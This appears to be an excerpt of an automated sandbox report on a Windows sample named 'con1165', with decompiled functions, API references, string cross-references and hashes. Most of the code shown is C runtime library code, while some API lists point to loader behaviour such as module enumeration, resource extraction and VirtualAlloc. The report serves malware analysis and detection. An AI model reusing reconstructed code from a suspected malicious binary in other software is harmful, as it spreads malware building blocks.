CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
Module32First.KERNEL32 ref: 00401C48
CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
Module32Next.KERNEL32 ref: 00401D02
Module32Next.KERNEL32 ref: 00401DB6
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401DC4
GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
LockResource.KERNEL32(00000000), ref: 00401EA7
SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
_malloc.LIBCMT ref: 00401EBA
_memset.LIBCMT ref: 00401EDD
SizeofResource.KERNEL32(00000000,?), ref: 00401F02

Strings

{, xrefs: 0040205B
x, xrefs: 00401B78
h, xrefs: 00401A6F
v, xrefs: 0040206A
', xrefs: 00401AF6
4, xrefs: 00401B64
o, xrefs: 00402097
U, xrefs: 004020F5
V, xrefs: 00402038
6, xrefs: 004020C5
[, xrefs: 00402047
{, xrefs: 00401E3C
', xrefs: 00402006
), xrefs: 0040202E
:, xrefs: 00401B28
___, xrefs: 0040227D
*, xrefs: 00401A1F
[, xrefs: 00401B37
*, xrefs: 004020E1
D, xrefs: 00401DFB
., xrefs: 00401B0A
{, xrefs: 0040211D
x, xrefs: 0040214A
!, xrefs: 0040201A
o, xrefs: 00401B8D
4, xrefs: 00402136
", xrefs: 00401B0F
x, xrefs: 00402088
8, xrefs: 00401BA9
v, xrefs: 0040212C
{, xrefs: 00401B4B
W, xrefs: 00401B14
%, xrefs: 004020FA
4, xrefs: 00402074
x, xrefs: 00401E69
v, xrefs: 00401E4B
o, xrefs: 00402159
W, xrefs: 004020E6
W, xrefs: 00402033
V, xrefs: 00401E19
!, xrefs: 004020CF
v, xrefs: 00401B5A
0, xrefs: 00401BBD
!, xrefs: 00401B1E
W, xrefs: 00401B23
_._, xrefs: 00402257
., xrefs: 0040201F
5, xrefs: 00402109
E, xrefs: 00401E0F

Memory Dump Source

Source File: 00000009.00000002.316168321.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.316168321.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.316168321.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_con1165.jbxd

Yara matches

Similarity

API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
API String ID: 2366190142-2962942730
Opcode ID: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
Opcode Fuzzy Hash: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B

Uniqueness

Uniqueness Score: -1.00%

Function 02DA003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02DA024D

Strings

kernel32.dll, xrefs: 02DA008F, 02DA0095
cess, xrefs: 02DA018D

Memory Dump Source

Source File: 00000009.00000002.316570894.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2da0000_con1165.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 48b348d86172ccfd96a4d05288099b9bc364b0fbe5e0df14979c086309b553f4
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 72526874A01229DFDB64CF68C994BA8BBB1BF09305F1480D9E94DAB351DB30AE95CF14

Uniqueness

Uniqueness Score: -1.00%

Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E004018F0(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
				void* __ebx;
				void* __ebp;
				signed int _t12;
				void* _t21;
				int _t25;
				void* _t30;
				int _t32;
				char* _t35;

				_t21 = __edx;
				_t35 = _a4;
				_t17 = __ecx;
				if(_t35 != 0) {
					_t25 = lstrlenA(_t35) + 1;
					E004017E0(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
					_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25); // executed
					asm("sbb esi, esi");
					_t30 =  ~_t12 + 1;
					if(_t30 != 0) {
						_t12 = GetLastError();
						if(_t12 == 0x7a) {
							_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
							E004017E0(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
							_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
							asm("sbb esi, esi");
							_t30 =  ~_t12 + 1;
						}
						if(_t30 != 0) {
							_t12 = E00401030();
						}
					}
					return _t12;
				} else {
					 *__ecx = _t35;
					return __eax;
				}
			}

0x004018f0
0x004018f2
0x004018f6
0x004018fa
0x00401917
0x0040191a
0x0040192f
0x00401939
0x0040193b
0x0040193e
0x00401940
0x00401949
0x0040195e
0x0040196b
0x00401980
0x0040198a
0x0040198c
0x0040198c
0x0040198f
0x00401991
0x00401991
0x0040198f
0x0040199a
0x004018fc
0x004018fc
0x00401900
0x00401900

APIs

lstrlenA.KERNEL32(?), ref: 00401906
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
GetLastError.KERNEL32 ref: 00401940
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980

Memory Dump Source

Source File: 00000009.00000002.316168321.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.316168321.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.316168321.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_con1165.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLastlstrlen
String ID:
API String ID: 3322701435-0
Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 63%

			E0040AF66(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
				signed int _v4;
				signed int _v16;
				signed int _v40;
				void* _t14;
				signed int _t15;
				intOrPtr* _t21;
				signed int _t24;
				void* _t28;
				void* _t39;
				void* _t40;
				signed int _t42;
				void* _t45;
				void* _t47;
				void* _t51;

				_t40 = __edi;
				_t28 = __ebx;
				_t45 = _t51;
				while(1) {
					_t14 = E0040B84D(_t28, _t39, _t40, _a4); // executed
					if(_t14 != 0) {
						break;
					}
					_t15 = E0040D2E3(_a4);
					__eflags = _t15;
					if(_t15 == 0) {
						__eflags =  *0x423490 & 0x00000001;
						if(( *0x423490 & 0x00000001) == 0) {
							 *0x423490 =  *0x423490 | 0x00000001;
							__eflags =  *0x423490;
							E0040AEFC(0x423484);
							E0040D2BD( *0x423490, 0x41a704);
						}
						E0040AF49( &_v16, 0x423484);
						E0040CD39( &_v16, 0x420fa4);
						asm("int3");
						_t47 = _t45;
						_push(_t47);
						_push(0xc);
						_push(0x420ff8);
						_t19 = E0040E1D8(_t28, _t40, 0x423484);
						_t42 = _v4;
						__eflags = _t42;
						if(_t42 != 0) {
							__eflags =  *0x4250b0 - 3;
							if( *0x4250b0 != 3) {
								_push(_t42);
								goto L16;
							} else {
								E0040D6E0(_t28, 4);
								_v16 = _v16 & 0x00000000;
								_t24 = E0040D713(_t42);
								_v40 = _t24;
								__eflags = _t24;
								if(_t24 != 0) {
									_push(_t42);
									_push(_t24);
									E0040D743();
								}
								_v16 = 0xfffffffe;
								_t19 = E0040B70B();
								__eflags = _v40;
								if(_v40 == 0) {
									_push(_v4);
									L16:
									__eflags = HeapFree( *0x4234b4, 0, ??);
									if(__eflags == 0) {
										_t21 = E0040BFC1(__eflags);
										 *_t21 = E0040BF7F(GetLastError());
									}
								}
							}
						}
						return E0040E21D(_t19);
					} else {
						continue;
					}
					L19:
				}
				return _t14;
				goto L19;
			}

0x0040af66
0x0040af66
0x0040af69
0x0040af7d
0x0040af80
0x0040af88
0x00000000
0x00000000
0x0040af73
0x0040af79
0x0040af7b
0x0040af8c
0x0040af98
0x0040af9a
0x0040af9a
0x0040afa3
0x0040afad
0x0040afb2
0x0040afb7
0x0040afc5
0x0040afca
0x0040afd0
0x0040aec2
0x0040b6b5
0x0040b6b7
0x0040b6bc
0x0040b6c1
0x0040b6c4
0x0040b6c6
0x0040b6c8
0x0040b6cf
0x0040b714
0x00000000
0x0040b6d1
0x0040b6d3
0x0040b6d9
0x0040b6de
0x0040b6e4
0x0040b6e7
0x0040b6e9
0x0040b6eb
0x0040b6ec
0x0040b6ed
0x0040b6f3
0x0040b6f4
0x0040b6fb
0x0040b700
0x0040b704
0x0040b706
0x0040b715
0x0040b723
0x0040b725
0x0040b727
0x0040b73a
0x0040b73c
0x0040b725
0x0040b704
0x0040b6cf
0x0040b742
0x00000000
0x00000000
0x00000000
0x00000000
0x0040af7b
0x0040af8b
0x00000000

APIs

_malloc.LIBCMT ref: 0040AF80

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3

Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08

std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
__CxxThrowException@8.LIBCMT ref: 0040AFC5

Memory Dump Source

Source File: 00000009.00000002.316168321.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.316168321.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.316168321.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_con1165.jbxd

Yara matches

Similarity

API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID:
API String ID: 1411284514-0
Opcode ID: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
Opcode Fuzzy Hash: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

Uniqueness

Uniqueness Score: -1.00%

Function 0040D2E3 Relevance: 3.0, APIs: 2, Instructions: 20
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E0040D2E3(void* _a4) {
				void* _t4;

				if(E004104E9( *0x4234b0) == 0) {
					L3:
					return 0;
				} else {
					_t4 = RtlAllocateHeap(_a4); // executed
					if(_t4 == 0) {
						goto L3;
					} else {
						return 1;
					}
				}
			}

0x0040d2f6
0x0040d307
0x0040d30a
0x0040d2f8
0x0040d2fb
0x0040d300
0x00000000
0x0040d302
0x0040d306
0x0040d306
0x0040d300

APIs

__decode_pointer.LIBCMT ref: 0040D2EE

Part of subcall function 004104E9: TlsGetValue.KERNEL32(00000000,?,00410584,?,00000001,0040BFC6,0040B72C), ref: 004104FB
Part of subcall function 004104E9: TlsGetValue.KERNEL32(00000007,?,00410584,?,00000001,0040BFC6,0040B72C), ref: 00410512
Part of subcall function 004104E9: RtlDecodePointer.NTDLL(00000001,?,00410584,?,00000001,0040BFC6,0040B72C), ref: 00410550

RtlAllocateHeap.NTDLL(00000001,0040E309,00000000,00421260,0000000C,00411CD0,00000001,00000000,00000000,00000000,00000000,?,004106E7,00000001,00000214), ref: 0040D2FB

Memory Dump Source

Source File: 00000009.00000002.316168321.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.316168321.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.316168321.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_con1165.jbxd

Yara matches

Similarity

API ID: Value$AllocateDecodeHeapPointer__decode_pointer
String ID:
API String ID: 2271146005-0
Opcode ID: 3356475c6407927fccda5560e9d7dca4201b206a5e29cd0f7ba3aad015978588
Instruction ID: 88164bcc90a7a4cb860d00303ba092558a8b397715b490c71cfd46f8756c470c
Opcode Fuzzy Hash: 3356475c6407927fccda5560e9d7dca4201b206a5e29cd0f7ba3aad015978588
Instruction Fuzzy Hash: 6CD0A93262414A2AAB202AF2FC204273FADEB812783040072A80CC04A0EE3AEC519008

Uniqueness

Uniqueness Score: -1.00%

Function 02DA0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02DA0223,?,?), ref: 02DA0E19
SetErrorMode.KERNELBASE(00000000,?,?,02DA0223,?,?), ref: 02DA0E1E

Memory Dump Source

Source File: 00000009.00000002.316570894.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2da0000_con1165.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 488e1e1f39a189ef5b28c1a121377fb738ef27ec2f108cb2e5b7847a0e32f2d8
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 40D0123114512877DB002A94DC09BCD7B1CDF09B67F008011FB0DD9180C7709A4046E6

Uniqueness

Uniqueness Score: -1.00%

Function 0040E7EE Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040E7EE(int _a4) {

				E0040E7C3(_a4); // executed
				ExitProcess(_a4);
			}

0x0040e7f6
0x0040e7ff

APIs

___crtCorExitProcess.LIBCMT ref: 0040E7F6

Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA

ExitProcess.KERNEL32 ref: 0040E7FF

Memory Dump Source

Source File: 00000009.00000002.316168321.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.316168321.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.316168321.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_con1165.jbxd

Yara matches

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5

Uniqueness

Uniqueness Score: -1.00%

Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040D534(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x4234b4 = _t6;
				if(_t6 != 0) {
					 *0x4250b0 = 1;
					return 1;
				} else {
					return _t6;
				}
			}

0x0040d549
0x0040d54f
0x0040d556
0x0040d55d
0x0040d563
0x0040d559
0x0040d559
0x0040d559

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549

Memory Dump Source

Source File: 00000009.00000002.316168321.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.316168321.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.316168321.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_con1165.jbxd

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA0A Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E0040EA0A(intOrPtr _a4) {
				void* __ebp;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t8;

				_push(0);
				_push(0);
				_push(_a4);
				_t2 = E0040E8DE(_t3, _t4, _t5, _t8); // executed
				return _t2;
			}

0x0040ea0f
0x0040ea11
0x0040ea13
0x0040ea16
0x0040ea1f

APIs

_doexit.LIBCMT ref: 0040EA16

Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4

Memory Dump Source

Source File: 00000009.00000002.316168321.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.316168321.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.316168321.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_con1165.jbxd

Yara matches

Similarity

API ID: __decode_pointer$__initterm$__lock_doexit
String ID:
API String ID: 1597249276-0
Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189

Uniqueness

Uniqueness Score: -1.00%

Function 02DA0920 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateProcess.KERNELBASE(000000FF,00000000), ref: 02DA0929

Memory Dump Source

Source File: 00000009.00000002.316570894.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2da0000_con1165.jbxd

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: a81f69529bcf2872433a6626b6dddab0307a3207cad9c1e7665d850a07e5ea8b
Instruction ID: f1a77b98683cafb1fb7459b4dcf7902f75ab8b99c0f73db378513641b05b932d
Opcode Fuzzy Hash: a81f69529bcf2872433a6626b6dddab0307a3207cad9c1e7665d850a07e5ea8b
Instruction Fuzzy Hash: 1190026038415011D820259C4C02B0510021751634F3047107170B91D4D84496144126

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040CE09 Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E0040CE09(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x422234; // 0xda5a588d
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x423b98 = _t6;
				 *0x423b94 = _t22;
				 *0x423b90 = _t25;
				 *0x423b8c = _t21;
				 *0x423b88 = _t27;
				 *0x423b84 = _t26;
				 *0x423bb0 = ss;
				 *0x423ba4 = cs;
				 *0x423b80 = ds;
				 *0x423b7c = es;
				 *0x423b78 = fs;
				 *0x423b74 = gs;
				asm("pushfd");
				_pop( *0x423ba8);
				 *0x423b9c =  *_t31;
				 *0x423ba0 = _v0;
				 *0x423bac =  &_a4;
				 *0x423ae8 = 0x10001;
				_t11 =  *0x423ba0; // 0x0
				 *0x423a9c = _t11;
				 *0x423a90 = 0xc0000409;
				 *0x423a94 = 1;
				_t12 =  *0x422234; // 0xda5a588d
				_v812 = _t12;
				_t13 =  *0x422238; // 0x25a5a772
				_v808 = _t13;
				 *0x423ae0 = IsDebuggerPresent();
				_push(1);
				E004138FC(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x41fb80);
				if( *0x423ae0 == 0) {
					_push(1);
					E004138FC(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce0f
0x0040ce11
0x0040ce11
0x00413644
0x00413649
0x0041364f
0x00413655
0x0041365b
0x00413661
0x00413667
0x0041366e
0x00413675
0x0041367c
0x00413683
0x0041368a
0x00413691
0x00413692
0x0041369b
0x004136a3
0x004136ab
0x004136b6
0x004136c0
0x004136c5
0x004136ca
0x004136d4
0x004136de
0x004136e3
0x004136e9
0x004136ee
0x004136fa
0x004136ff
0x00413701
0x00413709
0x00413714
0x00413721
0x00413723
0x00413725
0x0041372a
0x0041373e

APIs

IsDebuggerPresent.KERNEL32 ref: 004136F4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
TerminateProcess.KERNEL32(00000000), ref: 00413737

Memory Dump Source

Source File: 00000009.00000002.316168321.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.316168321.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.316168321.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_con1165.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D

Uniqueness

Uniqueness Score: -1.00%

Function 02DAD070 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 02DB395B
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02DB3970
UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 02DB397B
GetCurrentProcess.KERNEL32(C0000409), ref: 02DB3997
TerminateProcess.KERNEL32(00000000), ref: 02DB399E

Memory Dump Source

Source File: 00000009.00000002.316570894.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2da0000_con1165.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction ID: 813212063d24876f871255ad1b19c4e7bb059c60e0675002199e32d341d68d8b
Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction Fuzzy Hash: D021D4B9A01204EFD720DF64E9596857FB0FB08356F804079E50D87762E7B86A82CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040ADB0 Relevance: 2.5, APIs: 2, Instructions: 23
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ADB0(intOrPtr* __ecx) {
				void* _t5;
				intOrPtr* _t11;

				_t11 = __ecx;
				_t5 =  *(__ecx + 8);
				 *__ecx = 0x41eff0;
				if(_t5 != 0) {
					_t5 =  *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))(_t5);
				}
				if( *(_t11 + 0xc) != 0) {
					_t5 = GetProcessHeap();
					if(_t5 != 0) {
						return HeapFree(_t5, 0,  *(_t11 + 0xc));
					}
				}
				return _t5;
			}

0x0040adb3
0x0040adb5
0x0040adb8
0x0040adc0
0x0040adc8
0x0040adc8
0x0040adce
0x0040add0
0x0040add8
0x00000000
0x0040ade1
0x0040add8
0x0040ade8

APIs

GetProcessHeap.KERNEL32 ref: 0040ADD0
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1

Memory Dump Source

Source File: 00000009.00000002.316168321.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.316168321.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.316168321.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_con1165.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58

Uniqueness

